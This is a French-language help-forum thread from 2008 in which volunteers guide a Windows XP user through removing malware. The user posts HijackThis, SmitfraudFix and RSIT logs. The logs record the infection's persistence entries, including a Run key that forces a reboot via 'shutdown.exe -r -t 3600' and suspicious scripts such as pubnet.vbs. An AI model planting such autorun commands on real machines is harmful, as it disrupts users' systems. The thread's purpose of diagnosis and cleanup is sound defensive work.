Un virus genant

Fermé
espace - 20 nov. 2008 à 20:54
 espoir1 - 27 févr. 2010 à 15:52
salut tout le monde

Mon PC souffre d'un un logiciel malveillant malgré que j'ai essayé de l'éliminer avec les antivirus Avast et AVG.

Une description du problème est le suivant:
Juste que l'ordinateur démarre et que le bureau s'affiche une fenêtre de l'invite de commande s'affiche pour m'indiquer que le fichier shutdown.exe est entrain d'exécution juste après elle se referme et presque simultanément une autre fenêtre apparait contenant une alerte d'arrêt du système qui est la suivant"Arrêt du système. Veillezenregistrer tous les traveaux en cours et quitter votre session. Toutes les modifications non enregistrées seront perdues. Cet arrêt a été initié par IND_PC\THE INDIANS" et aussi un chronomètre initié à une heure ce qui fait que une fois l'heure s'écoule le système redémarre tout seul et parfois il se bloc même avant le redémarrage.

Voilà tout, j'espère que vous m'aidez a résoudre le problème le plus tôt possible car ça devient vraiment insupportable.
Et merci d'avance.

Petit précision c'est que je travail sous Windows XP

43 réponses

Effectivement ce fichier je le connais pas. Il s'agit d'une image en fait. Et le problème que ce fichier apparait dans chaque support que je branche (disquette ou flash) depuis quelques temps et que j'arrive pas à le supprimer définitivement (je le supprime puis il revient tout seul).
2
Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016 135
20 nov. 2008 à 21:09
Bonsoir,

Télécharge HijackThis ici :

-> http://www.trendsecure.com/portal/en-US/_download/HiJackThis.exe

Tutoriel d´instalation : (Merci a Balltrap34 pour cette réalisation)

-> http://pageperso.aol.fr/balltrap34/Hijenr.gif

Tutoriel d´utilisation (video) : (Merci a Balltrap34 pour cette réalisation)

-> http://perso.orange.fr/rginformatique/section%20virus/demohijack.htm

Renomer Hijackthis, pour contrer une éventuelle infection de Vundo.

ex:Renomme le fichier HijackThis.exe en CCM.exe pour cela, fais un clic droit sur le fichier HijackThis.exe et choisis renommer dans la liste

Ensuite avec Explorer créer un dossier c:\hijackthis
Décompresser Hijackthis dans ce dossier.
C'est important pour les sauvegardes.

Lance Hitjack this
Do a system scan and save a log file

Post le rapport généré ici stp...
0
Bonjour Sloubi76,

Merci pour ton aide, j'ai fait ce qui tu m'as demander de faire. j'espère que la prochaine fois que tu m'expliqueras aussi ce que je dois faire avec du détails et surtout avec simplicité.
Et voila le rapport et merci encore:

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 15:57:14, on 21/11/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0013)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\MATLAB701\webserver\bin\win32\matlabserver.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\Program Files\MMC.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://fr.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*https://fr.search.yahoo.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://fr.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = https://www.msn.com/fr-fr
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://fr.rd.yahoo.com/customize/ie/defaults/su/msgr9/*https://fr.search.yahoo.com/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://fr.rd.yahoo.com/customize/ie/defaults/sp/msgr9/*https://fr.search.yahoo.com/
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.msn.com/fr-fr
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://fr.rd.yahoo.com/customize/ie/defaults/su/msgr9/*https://fr.search.yahoo.com/
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O2 - BHO: Aide pour le lien d'Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [YSearchProtection] "C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe"
O4 - HKLM\..\Run: [Pubnet] C:\WINDOWS\system32\pubnet.vbs
O4 - HKLM\..\Run: [System] C:\WINDOWS\system32\shutdown.exe -r -t 3600 -c "Don't be sad is not a virus but wassim joke with you i know that is a bad joking and you can't do anything!!!"
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [swg] C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
O4 - HKCU\..\Run: [YSearchProtection] C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O4 - HKCU\..\Run: [kamsoft] C:\WINDOWS\system32\ckvo.exe
O4 - HKUS\S-1-5-19\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-19\..\RunOnce: [tscuninstall] %systemroot%\system32\tscupgrd.exe (User 'SERVICE LOCAL')
O4 - HKUS\S-1-5-20\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SERVICE RÉSEAU')
O4 - HKUS\S-1-5-18\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'SYSTEM')
O4 - HKUS\S-1-5-18\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [ctfmon.exe] C:\WINDOWS\system32\CTFMON.EXE (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [nlsf] cmd.exe /C move /Y "%SystemRoot%\System32\syssetub.dll" "%SystemRoot%\System32\syssetup.dll" (User 'Default user')
O8 - Extra context menu item: &Windows Live Search - res://C:\Program Files\Windows Live Toolbar\msntb.dll/search.htm
O8 - Extra context menu item: Download All by FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: Download using FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: E&xporter vers Microsoft Excel - res://C:\PROGRA~1\MICROS~3\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Open in new background tab - res://C:\Program Files\Windows Live Toolbar\Components\en-au\msntabres.dll.mui/229?62f47c35613842fc9a8d5a469c559a8c
O8 - Extra context menu item: Open in new foreground tab - res://C:\Program Files\Windows Live Toolbar\Components\en-au\msntabres.dll.mui/230?62f47c35613842fc9a8d5a469c559a8c
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Console Java (Sun) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O9 - Extra button: Recherche - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~3\OFFICE11\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe (file missing)
O9 - Extra 'Tools' menuitem: &FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\PROGRA~1\FlashGet\flashget.exe (file missing)
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (Installation Support) - C:\Program Files\Yahoo!\Common\Yinsthelper200711281.dll
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://www.update.microsoft.com/...
O17 - HKLM\System\CCS\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O17 - HKLM\System\CCS\Services\Tcpip\..\{C0927E70-C042-466C-A6A0-0488746AE93B}: NameServer = 213.150.176.196 193.95.67.22
O17 - HKLM\System\CS1\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O17 - HKLM\System\CS2\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer = 193.95.66.11,213.150.176.196
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: Service Bonjour (Bonjour Service) - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: ERDAS License Server - Unknown owner - C:\PROGRA~1\ERDASL~1\lmgrd.exe (file missing)
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: MATLAB Server (matlabserver) - Unknown owner - C:\MATLAB701\webserver\bin\win32\matlabserver.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
0
Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016 135 > espace
21 nov. 2008 à 20:51
Bonsoir Espace,

On démarre si tu veux bien,

Commences par ceci :

Télécharges SmitfraudFix (de S!Ri, balltrap34 et moe31 ) :
http://siri.urz.free.fr/Fix/SmitfraudFix.exe

!! Déconnectes toi, fermes toute tes applications et désactives tes défenses ( anti-virus ,anti-spyware,...) le temps de la manipe !!

Installes le soft à la racine de C\ ( et pas ailleurs! --->"C\:SmitfraudFix.exe" ) .

Tuto ( aide ) : http://siri.urz.free.fr/Fix/SmitfraudFix.php

Utilisation ---> option 1 / Recherche :
Double clique sur l'icône "Smitfraudfix.exe" et sélectionnes 1 (et pas sur autre chose sans notre accord !) pour créer un rapport des fichiers responsables de l'infection.

Postes le rapport ( "rapport.txt" qui se trouve sous C\: ) et attends la suite .

(Attention : "process.exe" ( un composant de l'outil ) est détecté par certains antivirus comme étant un RiskTool. Il ne s'agit pas d'un virus, mais d'un utilitaire destiné à mettre fin à des processus. Mis entre de mauvaises mains, cet utilitaire pourrait arrêter des logiciels de sécurité.)

@ +
0
espace > Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016
22 nov. 2008 à 14:10
Bonjour Sloubi76,

Merci encore pour l'aide précieux.
Et voila le rapport:

SmitFraudFix v2.376

Rapport fait à 14:02:50,82, 22/11/2008
Executé à partir de C:\Program Files\SmitfraudFix
OS: Microsoft Windows XP [version 5.1.2600] - Windows_NT
Le type du système de fichiers est NTFS
Fix executé en mode normal

»»»»»»»»»»»»»»»»»»»»»»»» Process

C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\MATLAB701\webserver\bin\win32\matlabserver.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\SmitfraudFix\Policies.exe
C:\WINDOWS\system32\cmd.exe

»»»»»»»»»»»»»»»»»»»»»»»» hosts


»»»»»»»»»»»»»»»»»»»»»»»» C:\


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\Web


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32


»»»»»»»»»»»»»»»»»»»»»»»» C:\WINDOWS\system32\LogFiles


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\THE INDIANS


»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\THEIND~1\LOCALS~1\Temp


»»»»»»»»»»»»»»»»»»»»»»»» C:\Documents and Settings\THE INDIANS\Application Data


»»»»»»»»»»»»»»»»»»»»»»»» Menu Démarrer


»»»»»»»»»»»»»»»»»»»»»»»» C:\DOCUME~1\THEIND~1\Favoris


»»»»»»»»»»»»»»»»»»»»»»»» Bureau


»»»»»»»»»»»»»»»»»»»»»»»» C:\Program Files

C:\Program Files\Google\googletoolbar1.dll PRESENT !

»»»»»»»»»»»»»»»»»»»»»»»» Clés corrompues


»»»»»»»»»»»»»»»»»»»»»»»» Eléments du bureau

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Desktop\Components\0]
"Source"="About:Home"
"SubscribedURL"="About:Home"
"FriendlyName"="Ma page d'accueil"


»»»»»»»»»»»»»»»»»»»»»»»» o4Patch
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

o4Patch
Credits: Malware Analysis & Diagnostic
Code: S!Ri



»»»»»»»»»»»»»»»»»»»»»»»» IEDFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri



»»»»»»»»»»»»»»»»»»»»»»»» VACFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


»»»»»»»»»»»»»»»»»»»»»»»» 404Fix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

404Fix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


»»»»»»»»»»»»»»»»»»»»»»»» Sharedtaskscheduler
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll


»»»»»»»»»»»»»»»»»»»»»»»» AppInit_DLLs
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"AppInit_DLLs"=""
"LoadAppInit_DLLs"=dword:00000001


»»»»»»»»»»»»»»»»»»»»»»»» Winlogon
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"
"System"=""


»»»»»»»»»»»»»»»»»»»»»»»» RK



»»»»»»»»»»»»»»»»»»»»»»»» DNS

Description: Carte Fast Ethernet PCI de base SiS 900 - Miniport d'ordonnancement de paquets
DNS Server Search Order: 193.95.66.11
DNS Server Search Order: 213.150.176.196

HKLM\SYSTEM\CCS\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196
HKLM\SYSTEM\CS1\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196
HKLM\SYSTEM\CS2\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196


»»»»»»»»»»»»»»»»»»»»»»»» Recherche infection wininet.dll


»»»»»»»»»»»»»»»»»»»»»»»» Fin
0
Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016 135 > espace
22 nov. 2008 à 14:55
Espace,

Redémarre en "Mode sans échec" : redémarre ton ordinateur et tapote sur la touche F8 jusqu'à l'affichage
du menu des options avancées de Windows, et sélectionne "Mode sans échec avec prise en charge du réseau".
Choisis ta session habituelle

Tapez sur la touche 2 du clavier puis valider par Entrée.
SmitFraudfix scanne alors l'ordinateur.. laissez l'opération s'effectuer
SmitFraudfix peut vous demander si vous désirez nettoyer le registre, répondez oui à la question, pour cela tapez sur la touche o puis validez par la touche entrée.
Une fois le nettoyage terminé, SmitFraudfix ouvre le rapport de nettoyage sur le bloc-note.
La connexion internet ne fonctionne pas en mode sans échec, enregistrez le rapport sur le bureau.

Redémarrez l'ordinateur en mode normal (comme d'habitude),

Sur votre bureau doit se trouver le rapport enregistré (sinon il est sur le Poste de Travail / Disque C / rapport.txt)
copier/coller le rapport pour cela :

* Cliquez sur le menu Edition puis Sélectionner tout.
* Cliquez à nouveau sur le menu Edition puis coller.
* Dans votre sujet sur le forum, créez un nouveau message puis clic droit / coller dans le message afin de coller le rapport.

@ +
0
espace > Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016
22 nov. 2008 à 20:08
Bonjour Sloubi76,

Vous êtes vraiment génial, bravo bravo et bravo c'est extra-ordinaire ce que tu viens de faire car tout simplement le problème est bien résolu et ça c'est grâce à ton ingéniosité. c'est tout simplement magnifique de votre part.

Après le grand désespoir c'est toi qui m'a aider alors vraiment merci, je vous le dit au fond de mon cœur et que dieu te béni.

Et merci surtout pour ta grande générosité et maintenant au revoir et pourquoi pas à très bientôt:


Et voilà comme même le rapport:
SmitFraudFix v2.376

Rapport fait à 18:24:19,96, 22/11/2008
Executé à partir de C:\Program Files\SmitfraudFix
OS: Microsoft Windows XP [version 5.1.2600] - Windows_NT
Le type du système de fichiers est NTFS
Fix executé en mode sans echec

»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Avant SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll

»»»»»»»»»»»»»»»»»»»»»»»» Arret des processus


»»»»»»»»»»»»»»»»»»»»»»»» hosts


127.0.0.1 localhost

»»»»»»»»»»»»»»»»»»»»»»»» VACFix

VACFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


»»»»»»»»»»»»»»»»»»»»»»»» Winsock2 Fix

S!Ri's WS2Fix: LSP not Found.


»»»»»»»»»»»»»»»»»»»»»»»» Generic Renos Fix

GenericRenosFix by S!Ri


»»»»»»»»»»»»»»»»»»»»»»»» Suppression des fichiers infectés

C:\Program Files\Google\googletoolbar1.dll supprimé

»»»»»»»»»»»»»»»»»»»»»»»» IEDFix

IEDFix
Credits: Malware Analysis & Diagnostic
Code: S!Ri



»»»»»»»»»»»»»»»»»»»»»»»» 404Fix

404Fix
Credits: Malware Analysis & Diagnostic
Code: S!Ri


»»»»»»»»»»»»»»»»»»»»»»»» RK


»»»»»»»»»»»»»»»»»»»»»»»» DNS

Description: Carte Fast Ethernet PCI de base SiS 900 - Miniport d'ordonnancement de paquets
DNS Server Search Order: 193.95.66.11
DNS Server Search Order: 213.150.176.196

HKLM\SYSTEM\CCS\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196
HKLM\SYSTEM\CCS\Services\Tcpip\..\{C0927E70-C042-466C-A6A0-0488746AE93B}: NameServer=213.150.176.196 193.95.67.22
HKLM\SYSTEM\CS1\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196
HKLM\SYSTEM\CS1\Services\Tcpip\..\{C0927E70-C042-466C-A6A0-0488746AE93B}: NameServer=213.150.176.196 193.95.67.22
HKLM\SYSTEM\CS2\Services\Tcpip\..\{1B98FF14-5179-4DAA-A0BD-3EDF62CFA17B}: NameServer=193.95.66.11,213.150.176.196


»»»»»»»»»»»»»»»»»»»»»»»» Suppression Fichiers Temporaires


»»»»»»»»»»»»»»»»»»»»»»»» Winlogon.System
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"System"=""


»»»»»»»»»»»»»»»»»»»»»»»» Nettoyage du registre

Nettoyage terminé.

»»»»»»»»»»»»»»»»»»»»»»»» SharedTaskScheduler Après SmitFraudFix
!!!Attention, les clés qui suivent ne sont pas forcément infectées!!!

SrchSTS.exe by S!Ri
Search SharedTaskScheduler's .dll


»»»»»»»»»»»»»»»»»»»»»»»» Fin
0
Utilisateur anonyme
22 nov. 2008 à 21:12
Salut espace

peux tu t inscrire sur le site et me rendre un service

uen fois incrit

va a ce fichier : C:\WINDOWS\system32\pubnet.vbs

fais un clic droit dessus et choisi modifié

ensuiet copie colle l intégralité du contenu pour me l adresser en messagerie privé merci d avance :


http://www.commentcamarche.net/communaute/profil Chiquitine29
0
Sloubi76 Messages postés 1366 Date d'inscription dimanche 11 mai 2008 Statut Membre Dernière intervention 10 décembre 2016 135
22 nov. 2008 à 21:21
Bonsoir Chiquitine,

à la recherche de nouveautés pour ton fix?

@ +
0
Utilisateur anonyme
22 nov. 2008 à 21:22
Salut en effet

@++
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
Utilisateur anonyme
24 nov. 2008 à 20:00
Salut

je prend la suite fais ceci stp,


Télécharge random's system information tool (RSIT) par random/random et sauvegarde-le sur le Bureau.
http://images.malwareremoval.com/random/RSIT.exe
Double-clique sur RSIT.exe afin de lancer RSIT.
Clique Continue à l'écran Disclaimer.
Si l'outil HIjackThis (version à jour) n'est pas présent ou non détecté sur l'ordinateur, RSIT le téléchargera (autorise l'accès dans ton pare-feu, si demandé) et tu devras accepter la licence.
Lorsque l'analyse sera terminée, deux fichiers texte s'ouvriront. Poste le contenu de log.txt (<<qui sera affiché)
0
bonjour Chiquitine29,

merci pour toi d'avoir participer et voila le rapport

Logfile of random's system information tool 1.04 (written by random/random)
Run by THE INDIANS at 2008-11-24 20:32:42
Microsoft Windows XP Professionnel Service Pack 2
System drive C: has 5 GB (28%) free of 18 GB
Total RAM: 255 MB (15% free)

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 20:33:09, on 24/11/2008
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.5730.0013)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Fichiers communs\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
C:\Program Files\Bonjour\mDNSResponder.exe
C:\MATLAB701\webserver\bin\win32\matlabserver.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe
C:\Program Files\Fichiers communs\Real\Update_OB\realsched.exe
C:\Program Files\Yahoo!\Search Protection\SearchProtection.exe
C:\WINDOWS\System32\WScript.exe
C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe
C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe
C:\Program Files\RSIT.exe
C:\Program Files\trend micro\THE INDIANS.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = Liens
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O2 - BHO: &Yahoo! Toolbar Helper - {02478D38-C3F9-4EFB-9B51-7695ECA05670} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O2 - BHO: Aide pour le lien d'Adobe PDF Reader - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Fichiers communs\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: RealPlayer Download and Record Plugin for Internet Explorer - {3049C3E9-B461-4BC5-8870-4C09146192CA} - C:\Program Files\Real\RealPlayer\rpbrowserrecordplugin.dll
O2 - BHO: WormRadar.com IESiteBlocker.NavFilter - {3CA2F312-6F6E-4B53-A66E-4E65E497C8C0} - C:\Program Files\AVG\AVG8\avgssie.dll (file missing)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_07\bin\ssv.dll
O2 - BHO: Programme d'aide de l'Assistant de connexion Windows Live - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Fichiers communs\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar1.dll (file missing)
O2 - BHO: Google Toolbar Notifier BHO - {AF69DE43-7D58-4638-B6FA-CE66B5AD205D} - C:\Program Files\Google\GoogleToolbarNotifier\3.1.807.1746\swg.dll
O2 - BHO: Windows Live Toolbar Helper - {BDBD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Windows Live Toolbar - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} - C:\Program Files\Windows Live Toolbar\msntb.dll
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn2\yt.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar1.dll (file missing)
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_07\bin\jusched.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
